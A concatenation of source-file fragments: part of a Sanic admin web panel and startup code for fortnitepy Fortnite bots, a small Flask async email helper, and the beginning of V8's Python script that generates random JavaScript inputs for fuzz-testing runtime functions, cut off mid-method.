return render_template(
"config_editor.html",
l=l,
data=corrected,
config_tags=config_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
corrected["status"] = 1
with open('config.json', 'w', encoding='utf-8') as f:
json.dump(corrected, f, ensure_ascii=False, indent=4, sort_keys=False)
if raw.get("reload"):
Thread(target=restart, args=(1,)).start()
return sanic.response.redirect("/")
else:
flash_messages.append(l('web_saved'))
return render_template(
"config_editor.html",
l=l,
data=corrected,
config_tags=config_tags,
len=len,
join=str.join,
split=str.split,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
@app.route("/commands_editor", methods=["GET", "POST"])
@auth.login_required
async def commands_editor(request: Request):
flash_messages = []
flash_messages_red = []
if request.method == "GET":
data = load_json("commands.json")
return render_template(
"commands_editor.html",
l=l,
data=data,
commands_tags=commands_tags,
len=len,
join=str.join,
split=str.split,
type=type,
can_be_multiple=CanBeMultiple,
select=select,
str=str,
int=int,
bool=bool,
list=list,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
elif request.method == "POST":
flag = False
raw = request.form
data = load_json("commands.json")
corrected = data
for key_,tags in commands_tags.items():
keys = key_.replace("'","").replace("[","").split("]")
key = keys[0]
nest = len(keys) - 1
if nest == 1:
if dict in tags:
if not corrected[key]:
corrected[key] = {}
else:
value = raw.get(f"['{key}']")
if FixRequired in tags and value == corrected.get(key):
flash_messages_red.append(l('this_field_fix_required', key))
flag = True
corrected[key] = re.split(r'\r\n|\n',value) if value else []
if flag:
return render_template(
"commands_editor.html",
l=l,
data=corrected,
commands_tags=commands_tags,
len=len,
join=str.join,
split=str.split,
type=type,
can_be_multiple=CanBeMultiple,
select=select,
str=str,
int=int,
bool=bool,
list=list,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
with open('commands.json', 'w', encoding='utf-8') as f:
json.dump(corrected, f, ensure_ascii=False, indent=4, sort_keys=False)
if raw.get("reload"):
Thread(target=restart, args=(1,)).start()
return sanic.response.redirect("/")
else:
flash_messages.append(l('web_saved'))
return render_template(
"commands_editor.html",
l=l,
data=corrected,
commands_tags=commands_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
select=select,
str=str,
int=int,
bool=bool,
list=list,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
@app.route("/replies_editor", methods=["GET", "POST"])
@auth.login_required
async def replies_editor(request: Request):
flash_messages = []
flash_messages_red = []
if request.method == "GET":
data = load_json("replies.json")
return render_template(
"replies_editor.html",
l=l,
data=data,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red,
len=len,
enumerate=enumerate,
str=str
)
elif request.method == "POST":
raw = request.form
corrected = {}
for num in range(0,int(raw["number"][0])):
trigger = raw.get(f"trigger{str(num)}")
if not trigger:
flash_messages_red.append(l('cannot_be_empty'))
break
content = raw.get(f"content{str(num)}")
if not content:
flash_messages_red.append(l('cannot_be_empty'))
break
corrected[trigger] = content
with open('replies.json', 'w', encoding='utf-8') as f:
json.dump(corrected, f, ensure_ascii=False, indent=4, sort_keys=False)
if raw.get("reload"):
Thread(target=restart, args=(1,)).start()
return sanic.response.redirect("/")
else:
flash_messages.append(l('web_saved'))
return render_template(
"replies_editor.html",
l=l,
data=corrected,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red,
len=len,
enumerate=enumerate,
str=str
)
@app.route("/party_viewer", methods=["GET"])
@auth.login_required
async def party_viewer(request: Request):
return render_template(
"party_viewer.html",
l=l,
clients=clients,
enumerate=enumerate
)
@app.route("/clients<num>", methods=["GET", "POST"])
@auth.login_required
async def clients_viewer(request: Request, num: str):
num = int(num)
client = clients[num] if clients[num:num+1] else None
if not client:
sanic.exceptions.abort(404)
flash_messages = []
if request.method == "GET":
return render_template(
"clients_viewer.html",
l=l,
client=client,
none=None,
len=len,
flash_messages=flash_messages
)
else:
if request.form.get("command"):
content = request.form["command"][0] if isinstance(request.form["command"],list) else request.form["command"]
message = WebMessage(content, request.cookies.get(auth.cookie_key, 'NoID'), client)
await process_command(message)
result = message.result
if result:
for mes in message.result:
for m in mes.split('\n'):
flash_messages.append(m)
return render_template(
"clients_viewer.html",
l=l,
client=client,
none=None,
len=len,
flash_messages=flash_messages
)
else:
return sanic.response.redirect(f"/clients{num}")
@app.route("/clients_info/<num>", methods=["GET"])
@auth.login_required
async def clients_info(request: Request, num: str):
num = int(num)
client = clients[num] if len(clients[num:num+1]) == 1 else None
if not client:
return sanic.response.json(
{
"error": "account_not_exists"
}
)
elif not client.isready:
return sanic.response.json(
{
"error": "account_not_loaded"
}
)
elif not client.party or not client.party.me:
return sanic.response.json(
{
"error": "party_moving"
}
)
else:
return sanic.response.json(
{
"display_name": client.user.display_name,
"id": client.user.id,
"leader": client.party.me.leader,
"banner": search_banner(client.party.me.banner[0]),
"level": client.party.me.banner[2],
"outfit": member_asset(client.party.me, "outfit"),
"outfit_variants": client.party.me.outfit_variants,
"backpack": member_asset(client.party.me, "backpack"),
"backpack_variants": client.party.me.backpack_variants,
"pickaxe": member_asset(client.party.me, "pickaxe"),
"pickaxe_variants": client.party.me.pickaxe_variants,
"contrail": member_asset(client.party.me, "contrail"),
"emote": member_asset(client.party.me, "emote"),
"party_id": client.party.id,
"members": [
{
"display_name": i.display_name,
"id": i.id,
"leader": i.leader,
"banner": search_banner(i.banner[0]),
"level": i.banner[2],
"outfit": member_asset(i, "outfit"),
"outfit_variants": i.outfit_variants,
"backpack": member_asset(i, "backpack"),
"backpack_variants": i.backpack_variants,
"pickaxe": member_asset(i, "pickaxe"),
"pickaxe_variants": i.pickaxe_variants,
"contrail": member_asset(i, "contrail"),
"emote": member_asset(i, "emote")
} for i in client.party.members
]
}
)
@app.route("/boot_switch", methods=["GET", "POST"])
@auth.login_required
async def boot_switch(request: Request):
if request.method == "GET":
return render_template(
"boot_switch.html",
l=l,
len=len
)
elif request.method == "POST":
raw = request.form
for i in raw.keys():
if "on" in i or "off" in i:
break
on_or_off = i
num = int(re.sub(r"on|off","", on_or_off))
on_or_off = i.replace(str(num),"")
loop = asyncio.get_event_loop()
if on_or_off == "on":
clients[num].booting = True
loop.create_task(clients[num].start())
elif on_or_off == "off":
loop.create_task(clients[num].close())
return sanic.response.redirect("/boot_switch")
@app.route("/boot_info", methods=["GET"])
@auth.login_required
async def boot_info(request: Request):
data = {}
for client in clients:
if not client.booting and not client.isready:
data[client.email] = {
"info": "info_closed",
"booting": client.booting,
"isready": client.isready
}
elif client.booting:
data[client.email] = {
"info": "info_booting",
"booting": client.booting,
"isready": client.isready
}
elif client.isready:
data[client.email] = {
"info": "info_ready",
"booting": client.booting,
"isready": client.isready
}
return sanic.response.json(data)
@app.exception(sanic.exceptions.NotFound)
async def not_found(request: Request, exception: Exception):
return render_template("not_found.html", l=l)
@auth.no_auth_handler
async def unauthorized(request: Request, *args, **kwargs):
return sanic.response.redirect("/")
loop = asyncio.get_event_loop()
if data.get('web',{}).get('enabled',True) is True or data.get('status',1) == 0:
loop.create_task(run_app())
Thread(target=dprint,args=(),daemon=True).start()
Thread(target=store_banner_data).start()
if data.get("status",1) != 0:
try:
langs = [
data["search-lang"],
data["sub-search-lang"]
] if data["sub-search-lang"] and data["sub-search-lang"] != data["search-lang"] else [
data["search-lang"]
]
store_item_data(langs)
except Exception:
send(l('bot'),l('api_downing'),red)
langs = [
data["search-lang"],
data["sub-search-lang"]
] if data["sub-search-lang"] and data["sub-search-lang"] != data["search-lang"] else [
data["search-lang"]
]
items = {}
styles = {}
with ThreadPoolExecutor() as executor:
items_futures = {executor.submit(search_item,lang,mode,data['fortnite'][type_.split(',')[0]],",".join(convert_to_new_type(i) for i in type_.split(','))): type_.split(',')[0] for lang in langs for mode in ("name","id") for type_ in ("outfit","backpack,pet","pickaxe","emote,emoji,toy")}
for future,type_ in items_futures.items():
result = future.result()
if result and not items.get(type_):
items[type_] = result[0]
with ThreadPoolExecutor() as executor:
styles_futures = {executor.submit(search_style,data["search-lang"],items.get(type_.split(',')[0],{}).get("id"),",".join(convert_to_new_type(i) for i in type_.split(','))): type_.split(',')[0] for type_ in ("outfit","backpack,pet","pickaxe") if data["fortnite"][f"{type_.split(',')[0]}_style"]}
for future,type_ in styles_futures.items():
result = future.result()
if result and not styles.get(type_):
variants = [i["variants"] for i in result if data["fortnite"][f"{type_}_style"] in i["name"]]
if variants:
styles[type_] = variants[0]
for email in data["fortnite"]["email"]:
email = email.strip()
try:
device_auth_details = get_device_auth_details().get(email.lower(), {})
if not device_auth_details:
device_auth_details = loop.run_until_complete(generate_device_auth_and_store(email))
client = Client(
auth=fortnitepy.DeviceAuth(
**device_auth_details
),
default_party_config=fortnitepy.DefaultPartyConfig(
privacy=data['fortnite']['privacy']
),
default_party_member_config=fortnitepy.DefaultPartyMemberConfig(
meta=[
partial(ClientPartyMember.set_outfit, items.get("outfit",{}).get("id",data["fortnite"]["outfit"]), variants=styles.get("outfit")),
partial(ClientPartyMember.set_backpack, items.get("backpack",{}).get("id",data["fortnite"]["backpack"]), variants=styles.get("backpack")),
partial(ClientPartyMember.set_pickaxe, items.get("pickaxe",{}).get("id",data["fortnite"]["pickaxe"]), variants=styles.get("pickaxe")),
partial(ClientPartyMember.set_battlepass_info, has_purchased=True, level=data['fortnite']['tier'], self_boost_xp=data['fortnite']['xpboost'], friend_boost_xp=data['fortnite']['friendxpboost']),
partial(ClientPartyMember.set_banner, icon=data['fortnite']['banner'], color=data['fortnite']['banner_color'], season_level=data['fortnite']['level'])
]
),
platform=fortnitepy.Platform(data['fortnite']['platform'].upper()),
emote=items.get("emote",{}).get("id",data["fortnite"]["emote"])
)
except ValueError:
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l("bot"),l('error_while_setting_client'),red,add_d=lambda x:f'>>> {x}')
continue
clients.append(client)
if data.get('status',1) != 0 and bot_ready:
loop.create_task(run_bot())
try:
loop.run_forever()
except KeyboardInterrupt:
sys.exit(1)
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask.ext.mail import Message
from . import mail
from app.tool.send_mail import send_email,send_163
def send_async_email(app, msg):
with app.app_context():
send_163(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
generate-runtime-tests.py
|
#!/usr/bin/env python
# Copyright 2014 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import itertools
import js2c
import multiprocessing
import optparse
import os
import random
import re
import shutil
import signal
import string
import subprocess
import sys
import time
FILENAME = "src/runtime.cc"
HEADERFILENAME = "src/runtime.h"
FUNCTION = re.compile("^RUNTIME_FUNCTION\(Runtime_(\w+)")
ARGSLENGTH = re.compile(".*ASSERT\(.*args\.length\(\) == (\d+)\);")
FUNCTIONEND = "}\n"
MACRO = re.compile(r"^#define ([^ ]+)\(([^)]*)\) *([^\\]*)\\?\n$")
FIRST_WORD = re.compile("^\s*(.*?)[\s({\[]")
WORKSPACE = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), ".."))
BASEPATH = os.path.join(WORKSPACE, "test", "mjsunit", "runtime-gen")
THIS_SCRIPT = os.path.relpath(sys.argv[0])
# Expand these macros, they define further runtime functions.
EXPAND_MACROS = [
"BUFFER_VIEW_GETTER",
"DATA_VIEW_GETTER",
"DATA_VIEW_SETTER",
"RUNTIME_UNARY_MATH",
]
# TODO(jkummerow): We could also whitelist the following macros, but the
# functions they define are so trivial that it's unclear how much benefit
# that would provide:
# ELEMENTS_KIND_CHECK_RUNTIME_FUNCTION
# FIXED_TYPED_ARRAYS_CHECK_RUNTIME_FUNCTION
# TYPED_ARRAYS_CHECK_RUNTIME_FUNCTION
# Counts of functions in each detection state. These are used to assert
# that the parser doesn't bit-rot. Change the values as needed when you add,
# remove or change runtime functions, but make sure we don't lose our ability
# to parse them!
EXPECTED_FUNCTION_COUNT = 358
EXPECTED_FUZZABLE_COUNT = 326
EXPECTED_CCTEST_COUNT = 6
EXPECTED_UNKNOWN_COUNT = 4
EXPECTED_BUILTINS_COUNT = 800
# Don't call these at all.
BLACKLISTED = [
"Abort", # Kills the process.
"AbortJS", # Kills the process.
"CompileForOnStackReplacement", # Riddled with ASSERTs.
"IS_VAR", # Not implemented in the runtime.
"ListNatives", # Not available in Release mode.
"SetAllocationTimeout", # Too slow for fuzzing.
"SystemBreak", # Kills (int3) the process.
# These are weird. They violate some invariants when called after
# bootstrapping.
"DisableAccessChecks",
"EnableAccessChecks",
# The current LiveEdit implementation relies on and messes with internals
# in ways that makes it fundamentally unfuzzable :-(
"DebugGetLoadedScripts",
"DebugSetScriptSource",
"LiveEditFindSharedFunctionInfosForScript",
"LiveEditFunctionSourceUpdated",
"LiveEditGatherCompileInfo",
"LiveEditPatchFunctionPositions",
"LiveEditReplaceFunctionCode",
"LiveEditReplaceRefToNestedFunction",
"LiveEditReplaceScript",
"LiveEditRestartFrame",
"SetScriptBreakPoint",
# TODO(jkummerow): Fix these and un-blacklist them!
"CreateDateTimeFormat",
"CreateNumberFormat",
]
# These will always throw.
THROWS = [
"CheckExecutionState", # Needs to hit a break point.
"CheckIsBootstrapping", # Needs to be bootstrapping.
"DebugEvaluate", # Needs to hit a break point.
"DebugEvaluateGlobal", # Needs to hit a break point.
"DebugIndexedInterceptorElementValue", # Needs an indexed interceptor.
"DebugNamedInterceptorPropertyValue", # Needs a named interceptor.
"DebugSetScriptSource", # Checks compilation state of script.
"GetAllScopesDetails", # Needs to hit a break point.
"GetFrameCount", # Needs to hit a break point.
"GetFrameDetails", # Needs to hit a break point.
"GetRootNaN", # Needs to be bootstrapping.
"GetScopeCount", # Needs to hit a break point.
"GetScopeDetails", # Needs to hit a break point.
"GetStepInPositions", # Needs to hit a break point.
"GetTemplateField", # Needs a {Function,Object}TemplateInfo.
"GetThreadCount", # Needs to hit a break point.
"GetThreadDetails", # Needs to hit a break point.
"IsAccessAllowedForObserver", # Needs access-check-required object.
"UnblockConcurrentRecompilation" # Needs --block-concurrent-recompilation.
]
# Definitions used in CUSTOM_KNOWN_GOOD_INPUT below.
_BREAK_ITERATOR = (
"%GetImplFromInitializedIntlObject(new Intl.v8BreakIterator())")
_COLLATOR = "%GetImplFromInitializedIntlObject(new Intl.Collator('en-US'))"
_DATETIME_FORMAT = (
"%GetImplFromInitializedIntlObject(new Intl.DateTimeFormat('en-US'))")
_NUMBER_FORMAT = (
"%GetImplFromInitializedIntlObject(new Intl.NumberFormat('en-US'))")
# Custom definitions for function input that does not throw.
# Format: "FunctionName": ["arg0", "arg1", ..., argslength].
# None means "fall back to autodetected value".
CUSTOM_KNOWN_GOOD_INPUT = {
"Apply": ["function() {}", None, None, None, None, None],
"ArrayBufferSliceImpl": [None, None, 0, None],
"ArrayConcat": ["[1, 'a']", None],
"BreakIteratorAdoptText": [_BREAK_ITERATOR, None, None],
"BreakIteratorBreakType": [_BREAK_ITERATOR, None],
"BreakIteratorCurrent": [_BREAK_ITERATOR, None],
"BreakIteratorFirst": [_BREAK_ITERATOR, None],
"BreakIteratorNext": [_BREAK_ITERATOR, None],
"CompileString": [None, "false", None],
"CreateBreakIterator": ["'en-US'", "{type: 'string'}", None, None],
"CreateJSFunctionProxy": [None, "function() {}", None, None, None],
"CreatePrivateSymbol": ["\"foo\"", None],
"CreateSymbol": ["\"foo\"", None],
"DateParseString": [None, "new Array(8)", None],
"DefineOrRedefineAccessorProperty": [None, None, "function() {}",
"function() {}", 2, None],
"FunctionBindArguments": [None, None, "undefined", None, None],
"GetBreakLocations": [None, 0, None],
"GetDefaultReceiver": ["function() {}", None],
"GetImplFromInitializedIntlObject": ["new Intl.NumberFormat('en-US')", None],
"InternalCompare": [_COLLATOR, None, None, None],
"InternalDateFormat": [_DATETIME_FORMAT, None, None],
"InternalDateParse": [_DATETIME_FORMAT, None, None],
"InternalNumberFormat": [_NUMBER_FORMAT, None, None],
"InternalNumberParse": [_NUMBER_FORMAT, None, None],
"IsSloppyModeFunction": ["function() {}", None],
"LoadMutableDouble": ["{foo: 1.2}", None, None],
"NewObjectFromBound": ["(function() {}).bind({})", None],
"NumberToRadixString": [None, "2", None],
"ParseJson": ["\"{}\"", 1],
"RegExpExecMultiple": [None, None, "['a']", "['a']", None],
"SetAccessorProperty": [None, None, "undefined", "undefined", None, None],
"SetIteratorInitialize": [None, None, "2", None],
"SetDebugEventListener": ["undefined", None, None],
"SetFunctionBreakPoint": [None, 200, None, None],
"StringBuilderConcat": ["[1, 2, 3]", 3, None, None],
"StringBuilderJoin": ["['a', 'b']", 4, None, None],
"StringMatch": [None, None, "['a', 'b']", None],
"StringNormalize": [None, 2, None],
"StringReplaceGlobalRegExpWithString": [None, None, None, "['a']", None],
"TypedArrayInitialize": [None, 6, "new ArrayBuffer(8)", None, 4, None],
"TypedArrayInitializeFromArrayLike": [None, 6, None, None, None],
"TypedArraySetFastCases": [None, None, "0", None],
}
# Types of arguments that cannot be generated in a JavaScript testcase.
NON_JS_TYPES = [
"Code", "Context", "FixedArray", "FunctionTemplateInfo",
"JSFunctionResultCache", "JSMessageObject", "Map", "ScopeInfo",
"SharedFunctionInfo"]
class Generator(object):
def RandomVariable(self, varname, vartype, simple):
if simple:
return self._Variable(varname, self.GENERATORS[vartype][0])
return self.GENERATORS[vartype][1](self, varname,
self.DEFAULT_RECURSION_BUDGET)
@staticmethod
def IsTypeSupported(typename):
return typename in Generator.GENERATORS
USUAL_SUSPECT_PROPERTIES = ["size", "length", "byteLength", "__proto__",
"prototype", "0", "1", "-1"]
DEFAULT_RECURSION_BUDGET = 2
PROXY_TRAPS = """{
getOwnPropertyDescriptor: function(name) {
return {value: function() {}, configurable: true, writable: true,
enumerable: true};
},
getPropertyDescriptor: function(name) {
return {value: function() {}, configurable: true, writable: true,
enumerable: true};
},
getOwnPropertyNames: function() { return []; },
getPropertyNames: function() { return []; },
defineProperty: function(name, descriptor) {},
delete: function(name) { return true; },
fix: function() {}
}"""
def _Variable(self, name, value, fallback=None):
args = { "name": name, "value": value, "fallback": fallback }
if fallback:
wrapper = "try { %%s } catch(e) { var %(name)s = %(fallback)s; }" % args
else:
wrapper = "%s"
return [wrapper % ("var %(name)s = %(value)s;" % args)]
def _Boolean(self, name, recursion_budget):
return self._Variable(name, random.choice(["true", "false"]))
def _Oddball(self, name, recursion_budget):
return self._Variable(name,
random.choice(["true", "false", "undefined", "null"]))
def _StrictMode(self, name, recursion_budget):
return self._Variable(name, random.choice([0, 1]))
def _Int32(self, name, recursion_budget=0):
die = random.random()
if die < 0.5:
value = random.choice([-3, -1, 0, 1, 2, 10, 515, 0x3fffffff, 0x7fffffff,
0x40000000, -0x40000000, -0x80000000])
elif die < 0.75:
value = random.randint(-1000, 1000)
else:
value = random.randint(-0x80000000, 0x7fffffff)
return self._Variable(name, value)
def _Uint32(self, name, recursion_budget=0):
die = random.random()
if die < 0.5:
value = random.choice([0, 1, 2, 3, 4, 8, 0x3fffffff, 0x40000000,
0x7fffffff, 0xffffffff])
elif die < 0.75:
value = random.randint(0, 1000)
else:
value = random.randint(0, 0xffffffff)
return self._Variable(name, value)
def _Smi(self, name, recursion_budget):
die = random.random()
if die < 0.5:
value = random.choice([-5, -1, 0, 1, 2, 3, 0x3fffffff, -0x40000000])
elif die < 0.75:
value = random.randint(-1000, 1000)
else:
value = random.randint(-0x40000000, 0x3fffffff)
return self._Variable(name, value)
def _Number(self, name, recursion_budget):
die = random.random()
if die < 0.5:
return self._Smi(name, recursion_budget)
elif die < 0.6:
value = random.choice(["Infinity", "-Infinity", "NaN", "-0",
"1.7976931348623157e+308", # Max value.
"2.2250738585072014e-308", # Min value.
"4.9406564584124654e-324"]) # Min subnormal.
else:
value = random.lognormvariate(0, 15)
return self._Variable(name, value)
def _RawRandomString(self, minlength=0, maxlength=100,
alphabet=string.ascii_letters):
length = random.randint(minlength, maxlength)
result = ""
for i in xrange(length):
result += random.choice(alphabet)
return result
def _SeqString(self, name, recursion_budget):
s1 = self._RawRandomString(1, 5)
s2 = self._RawRandomString(1, 5)
# 'foo' + 'bar'
return self._Variable(name, "\"%s\" + \"%s\"" % (s1, s2))
def _SeqTwoByteString(self, name):
s1 = self._RawRandomString(1, 5)
s2 = self._RawRandomString(1, 5)
# 'foo' + unicode + 'bar'
return self._Variable(name, "\"%s\" + \"\\2082\" + \"%s\"" % (s1, s2))
def _SlicedString(self, name):
s = self._RawRandomString(20, 30)
# 'ffoo12345678901234567890'.substr(1)
return self._Variable(name, "\"%s\".substr(1)" % s)
def _ConsString(self, name):
s1 = self._RawRandomString(8, 15)
s2 = self._RawRandomString(8, 15)
# 'foo12345' + (function() { return 'bar12345';})()
return self._Variable(name,
"\"%s\" + (function() { return \"%s\";})()" % (s1, s2))
def _InternalizedString(self, name):
return self._Variable(name, "\"%s\"" % self._RawRandomString(0, 20))
def _String(self, name, recursion_budget):
die = random.random()
if die < 0.5:
string = random.choice(self.USUAL_SUSPECT_PROPERTIES)
return self._Variable(name, "\"%s\"" % string)
elif die < 0.6:
number_name = name + "_number"
result = self._Number(number_name, recursion_budget)
return result + self._Variable(name, "\"\" + %s" % number_name)
elif die < 0.7:
return self._SeqString(name, recursion_budget)
elif die < 0.8:
return self._ConsString(name)
elif die < 0.9:
return self._InternalizedString(name)
else:
return self._SlicedString(name)
def _Symbol(self, name, recursion_budget):
raw_string_name = name + "_1"
result = self._String(raw_string_name, recursion_budget)
return result + self._Variable(name, "Symbol(%s)" % raw_string_name)
def _Name(self, name, recursion_budget):
if random.random() < 0.2:
return self._Symbol(name, recursion_budget)
return self._String(name, recursion_budget)
def _JSValue(self, name, recursion_budget):
die = random.random()
raw_name = name + "_1"
if die < 0.33:
result = self._String(raw_name, recursion_budget)
return result + self._Variable(name, "new String(%s)" % raw_name)
elif die < 0.66:
result = self._Boolean(raw_name, recursion_budget)
return result + self._Variable(name, "new Boolean(%s)" % raw_name)
else:
result = self._Number(raw_name, recursion_budget)
return result + self._Variable(name, "new Number(%s)" % raw_name)
def _RawRandomPropertyName(self):
if random.random() < 0.5:
return random.choice(self.USUAL_SUSPECT_PROPERTIES)
return self._RawRandomString(0, 10)
def _AddProperties(self, name, result, recursion_budget):
propcount = random.randint(0, 3)
propname = None
for i in range(propcount):
die = random.random()
if die < 0.5:
propname = "%s_prop%d" % (name, i)
result += self._Name(propname, recursion_budget - 1)
else:
propname = "\"%s\"" % self._RawRandomPropertyName()
propvalue_name = "%s_val%d" % (name, i)
result += self._Object(propvalue_name, recursion_budget - 1)
result.append("try { %s[%s] = %s; } catch (e) {}" %
(name, propname, propvalue_name))
if random.random() < 0.2 and propname:
# Force the object to slow mode.
result.append("delete %s[%s];" % (name, propname))
def _RandomElementIndex(self, element_name, result):
if random.random() < 0.5:
return random.randint(-1000, 1000)
result += self._Smi(element_name, 0)
return element_name
def _AddElements(self, name, result, recursion_budget):
elementcount = random.randint(0, 3)
for i in range(elementcount):
element_name = "%s_idx%d" % (name, i)
index = self._RandomElementIndex(element_name, result)
value_name = "%s_elt%d" % (name, i)
result += self._Object(value_name, recursion_budget - 1)
result.append("try { %s[%s] = %s; } catch(e) {}" %
(name, index, value_name))
def _AddAccessors(self, name, result, recursion_budget):
accessorcount = random.randint(0, 3)
for i in range(accessorcount):
propname = self._RawRandomPropertyName()
what = random.choice(["get", "set"])
function_name = "%s_access%d" % (name, i)
result += self._PlainFunction(function_name, recursion_budget - 1)
result.append("try { Object.defineProperty(%s, \"%s\", {%s: %s}); } "
"catch (e) {}" % (name, propname, what, function_name))
def _PlainArray(self, name, recursion_budget):
die = random.random()
if die < 0.5:
literal = random.choice(["[]", "[1, 2]", "[1.5, 2.5]",
"['a', 'b', 1, true]"])
return self._Variable(name, literal)
else:
new = random.choice(["", "new "])
length = random.randint(0, 101000)
return self._Variable(name, "%sArray(%d)" % (new, length))
def _PlainObject(self, name, recursion_budget):
die = random.random()
if die < 0.67:
literal_propcount = random.randint(0, 3)
properties = []
result = []
for i in range(literal_propcount):
propname = self._RawRandomPropertyName()
propvalue_name = "%s_lit%d" % (name, i)
result += self._Object(propvalue_name, recursion_budget - 1)
properties.append("\"%s\": %s" % (propname, propvalue_name))
return result + self._Variable(name, "{%s}" % ", ".join(properties))
else:
return self._Variable(name, "new Object()")
def _JSArray(self, name, recursion_budget):
result = self._PlainArray(name, recursion_budget)
self._AddAccessors(name, result, recursion_budget)
self._AddProperties(name, result, recursion_budget)
self._AddElements(name, result, recursion_budget)
return result
def _RawRandomBufferLength(self):
if random.random() < 0.2:
return random.choice([0, 1, 8, 0x40000000, 0x80000000])
return random.randint(0, 1000)
def _JSArrayBuffer(self, name, recursion_budget):
length = self._RawRandomBufferLength()
return self._Variable(name, "new ArrayBuffer(%d)" % length)
def _JSDataView(self, name, recursion_budget):
buffer_name = name + "_buffer"
result = self._JSArrayBuffer(buffer_name, recursion_budget)
args = [buffer_name]
die = random.random()
if die < 0.67:
offset = self._RawRandomBufferLength()
args.append("%d" % offset)
if die < 0.33:
length = self._RawRandomBufferLength()
args.append("%d" % length)
result += self._Variable(name, "new DataView(%s)" % ", ".join(args),
fallback="new DataView(new ArrayBuffer(8))")
return result
def _JSDate(self, name, recursion_budget):
die = random.random()
if die < 0.25:
return self._Variable(name, "new Date()")
elif die < 0.5:
ms_name = name + "_ms"
result = self._Number(ms_name, recursion_budget)
return result + self._Variable(name, "new Date(%s)" % ms_name)
elif die < 0.75:
str_name = name + "_str"
month = random.choice(["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul",
"Aug", "Sep", "Oct", "Nov", "Dec"])
day = random.randint(1, 28)
year = random.randint(1900, 2100)
hour = random.randint(0, 23)
minute = random.randint(0, 59)
second = random.randint(0, 59)
str_value = ("\"%s %s, %s %s:%s:%s\"" %
(month, day, year, hour, minute, second))
result = self._Variable(str_name, str_value)
return result + self._Variable(name, "new Date(%s)" % str_name)
else:
components = tuple(map(lambda x: "%s_%s" % (name, x),
["y", "m", "d", "h", "min", "s", "ms"]))
return ([j for i in map(self._Int32, components) for j in i] +
self._Variable(name, "new Date(%s)" % ", ".join(components)))
def _PlainFunction(self, name, recursion_budget):
result_name = "result"
body = ["function() {"]
body += self._Object(result_name, recursion_budget - 1)
body.append("return result;\n}")
return self._Variable(name, "%s" % "\n".join(body))
def _JSFunction(self, name, recursion_budget):
result = self._PlainFunction(name, recursion_budget)
self._AddAccessors(name, result, recursion_budget)
self._AddProperties(name, result, recursion_budget)
self._AddElements(name, result, recursion_budget)
return result
def _JSFunctionProxy(self, name, recursion_budget):
# TODO(jkummerow): Revisit this as the Proxy implementation evolves.
return self._Variable(name, "Proxy.createFunction(%s, function() {})" %
self.PROXY_TRAPS)
def _JSGeneratorObject(self, name, recursion_budget):
# TODO(jkummerow): Be more creative here?
return self._Variable(name, "(function*() { yield 1; })()")
def _JSMap(self, name, recursion_budget, weak=""):
result = self._Variable(name, "new %sMap()" % weak)
num_entries = random.randint(0, 3)
for i in range(num_entries):
key_name = "%s_k%d" % (name, i)
value_name = "%s_v%d" % (name, i)
if weak:
result += self._JSObject(key_name, recursion_budget - 1)
else:
result += self._Object(key_name, recursion_budget - 1)
result += self._Object(value_name, recursion_budget - 1)
result.append("%s.set(%s, %s)" % (name, key_name, value_name))
return result
def _JSMapIterator(self, name, recursion_budget):
map_name = name + "_map"
result = self._JSMap(map_name, recursion_budget)
iterator_type = random.choice(['keys', 'values', 'entries'])
return (result + self._Variable(name, "%s.%s()" %
(map_name, iterator_type)))
def _JSProxy(self, name, recursion_budget):
# TODO(jkummerow): Revisit this as the Proxy implementation evolves.
return self._Variable(name, "Proxy.create(%s)" % self.PROXY_TRAPS)
def _JSRegExp(self, name, recursion_budget):
flags = random.choice(["", "g", "i", "m", "gi"])
string = "a(b|c)*a" # TODO(jkummerow): Be more creative here?
ctor = random.choice(["/%s/%s", "new RegExp(\"%s\", \"%s\")"])
return self._Variable(name, ctor % (string, flags))
def _JSSet(self, name, recursion_budget, weak=""):
result = self._Variable(name, "new %sSet()" % weak)
num_entries = random.randint(0, 3)
for i in range(num_entries):
element_name = "%s_e%d" % (name, i)
if weak:
result += self._JSObject(element_name, recursion_budget - 1)
else:
result += self._Object(element_name, recursion_budget - 1)
result.append("%s.add(%s)" % (name, element_name))
return result
def _JSSetIterator(self, name, recursion_budget):
set_name = name + "_set"
result = self._JSSet(set_name, recursion_budget)
iterator_type = random.choice(['values', 'entries'])
return (result + self._Variable(name, "%s.%s()" %
(set_name, iterator_type)))
def _JSTypedArray(self, name, recursion_budget):
arraytype = random.choice(["Int8", "Int16", "Int32", "Uint8", "Uint16",
"Uint32", "Float32", "Float64", "Uint8Clamped"])
ctor_type = random.randint(0, 3)
if ctor_type == 0:
length = random.randint(0, 1000)
return self._Variable(name, "new %sArray(%d)" % (arraytype, length),
fallback="new %sArray(8)" % arraytype)
elif ctor_type == 1:
input_name = name + "_typedarray"
result = self._JSTypedArray(input_name, recursion_budget - 1)
return (result +
self._Variable(name, "new %sArray(%s)" % (arraytype, input_name),
fallback="new %sArray(8)" % arraytype))
